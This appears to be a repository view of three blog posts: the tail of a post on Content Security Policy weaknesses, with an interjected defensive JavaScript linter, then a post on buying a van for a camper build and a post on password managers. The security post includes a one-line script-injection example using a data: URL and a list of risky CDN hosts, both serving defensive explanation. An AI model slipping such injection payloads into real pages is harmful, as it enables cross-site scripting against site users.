### Domains Which Allow Uploads
When you include a domain in your CSP, you're essentially giving control of your
website's security to that platform and all the developers who publish code on
it. Not only does this potentially introduce [supply chain
attacks](https://thehackernews.com/2024/07/polyfillio-attack-impacts-over-380000.html),
many CDNs also allow public submission. Unpkg, for instance, is a popular CDN
that hosts everything on NPM. All you need to submit code to it is a free NPM
account. If a CSP includes unpkg, or one of the many similar services, anyone
can publish a package and the CSP will allow that code to run on your site.
#### Self source
It is worth noting that the `'self'` keyword can introduce a similar issue.
The `'self'` source is a shortcut to allow sources from
the current [origin](https://developer.mozilla.org/en-US/docs/Glossary/Origin).
The difference between origin and site has been discussed [elsewhere in more
detail](https://jakearchibald.com/2021/cors/#origins-vs-sites), but briefly, an
origin is defined by the scheme (protocol), hostname (domain) and port of the URL.
Subdomains are a different origin, although usually the same site.
```
https://example.jonathanh.co.uk:443/something/cool
│                                 │
└─────────────Origin──────────────┘
https://example.jonathanh.co.uk:443/something/cool
                │             │
                └────Site─────┘
```
Normally, including `'self'` is safe, although care should be taken if you allow
users of your site to upload content and that content is served from the same
origin. If so, a user could upload a file that the browser will run as a script
and bypass the CSP, as the file is available under a `'self'` URL. Serving
uploads from a separate origin (or at the very least with a correct
`Content-Type` and `X-Content-Type-Options: nosniff`) avoids this.
### Other Permissive Sources
The following are considered permissive. I won't go into too much detail for
each, but ideally you should avoid using:
* `https:` - Any source that is hosted on an encrypted server. A malicious actor
  can very easily spin up a server with a valid certificate; certificates are
  free and automated, so TLS says nothing about who the host is.
* `data:` - Any source that can be loaded via a data scheme. In most cases, this
  just involves base64 encoding a payload, although
  `<script src="data:text/javascript,alert(1)"></script>` is enough to show the problem.
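As an added example (my own code, not from the post), here is a small linter that reads a policy and reports the allow-list mistakes from the sections above: `'unsafe-inline'`, `'unsafe-eval'`, the scheme-only and wildcard sources, and whole-host entries for CDNs that serve JSONP or publicly submitted packages. The `RISKY_HOSTS` list is an assumption for illustration, not a complete inventory, and the policy strings fed to it are constructed.

```javascript
// Hosts assumed (for this example) to serve JSONP endpoints or publicly
// submitted packages; extend this for your own environment.
const RISKY_HOSTS = new Set(['unpkg.com', 'cdnjs.cloudflare.com', 'ajax.googleapis.com']);

// Split a policy into a Map of directive name -> source expressions.
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives.set(tokens[0].toLowerCase(), tokens.slice(1));
  }
  return directives;
}

// Report the weaknesses this post discusses for the script allow-list.
function lintScriptSrc(header) {
  const directives = parseCsp(header);
  // script-src falls back to default-src; with neither, every script is allowed.
  const sources = directives.get('script-src') || directives.get('default-src');
  if (!sources) return ['no script-src or default-src: every script is allowed'];

  const findings = [];
  for (const src of sources) {
    const s = src.toLowerCase();
    if (s === "'unsafe-inline'") {
      findings.push("'unsafe-inline': any injected inline script runs; use nonces or hashes instead");
    } else if (s === "'unsafe-eval'") {
      findings.push("'unsafe-eval': eval(), new Function() and string setTimeout() turn strings into code");
    } else if (s === '*' || s === 'https:' || s === 'http:') {
      findings.push(`${src}: scripts from any host are allowed`);
    } else if (s === 'data:') {
      findings.push("data:: scripts can be loaded from data: URLs, so an encoded payload is enough");
    } else if (!s.startsWith("'")) {
      // Host source: [scheme://]host[:port][/path]
      const m = s.match(/^(?:[a-z][a-z0-9+.-]*:\/\/)?([^/]+)(\/.*)?$/);
      if (!m) continue;
      const host = m[1].replace(/:(\d+|\*)$/, '');
      const path = m[2];
      if (host.startsWith('*.')) {
        findings.push(`${src}: every subdomain of ${host.slice(2)} is trusted`);
      }
      if (RISKY_HOSTS.has(host) && !path) {
        findings.push(`${src}: whole host allow-listed; pin a path to the file you actually need`);
      }
    }
  }
  return findings;
}
```

Run it against the `Content-Security-Policy` header your site actually sends (for instance copied out of `curl -sI`) rather than the one you believe it sends; the two differ more often than you would expect.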

content/blog/022-new-van.md Normal file
---
title: I Got a Van
date: 2024-08-24
tags:
- Van Build
description: >
I've bought a van. I'm planning on converting it to a camper and documenting
the process here.
---
So, as you've probably gathered from the title, I've bought a van. Or, at least,
reserved it, I actually pick it up in a couple of weeks. It's a 2019 Fiat Ducato
L4H2 which means it's long and quite tall.
There will be 3 of us using the van. Me, my wife, and our lurcher, Rumple. One
of the biggest requirements we have is that the van is both comfortable and safe
for him to live and travel in. We have some ideas and thoughts around this, but
you will hopefully see what that looks like in future posts.
My plan is to convert this van into a camper. This first post is mainly a brain
dump, for me as much as anyone else, about my current plans. Many will change,
some may be scrapped all together.
We are not planning on living in the van. However, it would be nice if we can go
away for prolonged trips in it. Maybe a month or 6 weeks at a time. Obviously,
we will use it for shorter weekend breaks, but we don't want to be limited
to a week or so at a time. As a result, we should be able to work from the van.
We are in a very fortunate position that my wife and I both work from home for
the vast majority of the time. As a result, as long as we have a reasonable
internet connection and electricity, we can both work.
Obviously, if we are both working off laptops, and potentially with additional
monitors, our power consumption is likely to be on the higher end. The electrical
system in the van will definitely be a separate blog post, but at the moment, it
looks like we'll be going for [LiFePO_4_
batteries](https://en.wikipedia.org/wiki/Lithium_iron_phosphate_battery).
Hopefully with 2 or 3 solar panels on the roof, as well as DC to DC charging so
we can charge the batteries whilst driving. We will probably also add a shore
power hookup, but that may come further down the line.
For the internet side of things, I plan to mount a 5G antenna on the roof.
Despite the name, it should pick up all the Gs. I will be on the look out for a
router that I can plug such an antenna into, preferably one that supports
something like OpenWrt.
This brings me quite nicely onto my plans for the Van's network. I hate WiFi. It
will be available in the van for all my ESP boards (more on that later), but if
I'm working on my laptop, I want it plugged in with a cable. So, I will be
running Ethernet in my van, as well as power and water and whatever else I need
to make it into a camper. I won't be going overboard like I did in my house -
weight is a consideration in a van and cables are heavy; but I will be running
it to (as a minimum) the office space for me and my wife, and my van server.
Van server? Yes, you heard (read?) that right. I'll be having a server in my
van. I am not sure yet if I'll be going down the Pi route, or something like a
Nuc, but I will be having a low-ish powered server in the van. This will run
things like [Home Assistant](https://www.home-assistant.io/) (more on that in a
bit), [PiHole](https://pi-hole.net/),
[AudioBookShelf](https://www.audiobookshelf.org/),
[WireGuard](https://www.wireguard.com/) and maybe a few other things.
Importantly, I won't be using it to run things that need a lot of power - think
Jellyfin, Ollama and such.
Things might change. Obviously, with a server that can go on motorways, spinning
hard drives are a no-go. So storage is likely to have to be solid state for
everything. As a result, I won't really be using this for a NAS. Storage of
photos and videos will still go to my home server in my house. But things like
audiobooks and podcasts that I am likely to want to listen to on the go will be
stored on the local network.
So, I mentioned Home Assistant. I am a big fan of **some** smart home tech. For
me to be a fan of it, it needs to run (or be made to run) locally. Being able to
turn your lights on from your phone is great, but if the switch on the wall
doesn't work without an internet connection, I'm not interested. In my house,
all of our light switches have been flashed with [ESPHome](https://esphome.io/).
This custom firmware allows the switch to be controlled via Home Assistant, but
importantly, even if my network has some catastrophic failure, the button still
works. In the van, the chances of no internet are likely to be high - even with
a fancy antenna on the roof. So, requiring the internet is an absolute no go for
me.
That will probably mean a whole bunch of DIY devices. I should be able to quite
easily make things like lighting smart. I would also like to think that things
like water sensors for my fresh and waste water can be read by an ESP device.
What will probably take a bit more work / experimentation will be plugging an
ESP device into the vehicle's CAN bus to see if I can read data from that. It
would also be great to have things like ceiling fans and heaters controllable
from Home Assistant.
Talking of fans and heaters, it is probably worth me mentioning that I will be
trying to keep costs down where possible - or at least prioritising where money
is spent. I would much rather, for instance, buy a cheap [Chinese ceiling
fan](https://www.aliexpress.com/item/1005007224984817.html) or [diesel
heater](https://www.aliexpress.com/item/1005006359176237.html) so I can buy
decent electronics from the likes of [Victron](https://www.victronenergy.com/).
Of course, I'll be taking things like the fans apart to see if I can stick an
ESP chip in them and control them with Home Assistant.
With regard to cooking in the van, I'm currently undecided on the best course of
action. I would like to go fully electric, with induction hobs and an electric
oven. Obviously, this would mean I need even more batteries in the van, which
will increase the weight even more. However, I think with the amount of driving
we normally do, I should be able to keep batteries topped up from the vehicle's
alternator. It is possible that we will keep a gas camping stove somewhere so
that if we're caught out, we can still boil water and heat food. But I would
rather avoid the added hassle of gas canisters and piping if I can.
With regard to water, I would like to mount both fresh and waste water tanks
under the van. I don't yet know how big they will be, and will probably be
determined by weight restrictions. However, my plan is to fit a low powered
immersion heater into these to prevent them freezing in the winter. I won't be
using this to make hot water, just to keep the temperature of the water above
freezing - again probably powered by an ESP chip.
Hot water is a different story. I have seen many youtube van builders pipe their
diesel heater's pipe to a heat exchanger to heat the water. I may do this, but I
would also like to try and heat the water from the engine's coolant system. I
haven't seen this done in a camper (I'm not suggesting it hasn't been done), but
I have seen it done [on other
vehicles](https://www.youtube.com/watch?v=LKmkqenpE5o).
One thing I'm fairly sure I don't want in the van is a full sized shower. At
least, not an internal one. Space is a premium in a van, and in my opinion, the
space a shower takes up is unnecessary. I will probably add something like the
[Bullfinch External Shower
Point](https://camperwarehouse.co.uk/product/bullfinch-external-shower-point-white/),
so we can have outdoor showers if we need them. But most of the time, I think
we'll be able to make do with a flannel and a bowl of hot water. It does mean
that the sink in the van will need to be big enough to wash our hair in. An
added bonus of the external shower system is we'll be able to wash off Rumple
before he gets in the van when he inevitably gets covered in mud.
The only thing I haven't really touched upon is the planned layout. That will
probably be my next blog post, but I plan to keep it quite simple. Bed at the
back. Undecided yet on the orientation, and that will depend if I can sleep
width ways once we've added the insulation. If I can't, and we end up making the
bed go length ways, we will probably have an "almost" fixed bed, where the
bottom foot or so is removable and is used as a back rest or something. This
frees up some more space in the middle of the van during the day, but still
means we don't need to make our bed each evening.
The cab area will have swivel seats. This will make our main living / working
area, and as a result, we won't have a separate "lounge". Again, space is at a
premium in a van.
Between the cab / living area and the bed will be our kitchen and toilet areas,
as well as a spot for Rumple's bed. Importantly this will include a mounting
point for his harness so he is secured whilst driving.
Before I finish up, it's probably important that I clarify a few things. I will
be learning as I go. I will be making mistakes and I will aim to share those
with you. However, this "build log" will not be tutorials. I am not an
electrician, so don't take electrical advice off me. Same for plumbing or
carpentry or anything else for that matter. That being said, if you spot
something I could be doing better, or an idea you think I might like, or just
want to say hi, leave a comment by emailing `comments.new-van<at>jn.hn`.

---
title: Passwords Most Fowl
date: 2024-12-26
tags:
- Security
description: >
If you're like me, some of yesterday (Christmas 2024) was spent watching the
new Wallace and Gromit. I wonder if like me it also got you thinking about
password managers.
---
**Warning:** Contains Spoilers!
If you caught the latest episode, "Vengeance Most Fowl", you know they were
once again up against the sneaky Feathers McGraw, who pulls off a pretty clever
hack involving a "smart gnome". The twist? The gnome's password was super easy
to guess! While it's all in good fun, it's a great reminder of why we should all
be using password managers.
In the episode, Feathers McGraw's ability to crack the gnome's password
highlights a real issue we face today: weak passwords. Let's be honest, are you
still using simple passwords like birthdays or pets' names? Or maybe your pet's
name with a 1 and an exclamation mark? It's way too easy for hackers to figure
those out, and that puts our personal info at risk.
Now, imagine if Wallace had a password manager. If he'd used it properly,
he would've had strong, unique passwords for all his inventions and accounts.
He could have even shared the passwords with his trusty companion.
That would've made it nearly impossible for Feathers McGraw - or anyone else for
that matter - to break into the gnomes. Or at least, not by guessing the
passwords.
I'd also like to draw attention to everything getting "smart". In our
increasingly connected world, it seems like everything is getting a smart
upgrade - from our fridges to our light bulbs, and even garden gnomes!
While the convenience of smart devices can be appealing, there are some serious
risks that come with connecting everything to the internet. In "Vengeance Most
Fowl," the hacked smart gnome serves as a perfect example of how these devices
can become vulnerabilities. When we connect everyday items to the internet, we
open the door for hackers to exploit them, potentially gaining access to our
personal information or even taking control of our homes.
Whilst the gnomes in Wallace and Gromit were obviously over the top and comical,
it's become the norm for everything from cameras to lawn mowers to be connected.
Imagine a world where your smart gnome could be used to spy on you or trigger a
series of unfortunate events, just like in the episode. The more devices we
connect, the more points of entry there are for cybercriminals. Many of these
smart devices come with default passwords or lack robust security features,
making them easy targets. It's crucial to remember that while technology can
make our lives easier, it also requires us to be vigilant about our security
practices. By being mindful of what we connect to the internet and ensuring that
we use strong passwords and security measures, we can enjoy the benefits of
smart technology without falling victim to the dangers it can bring.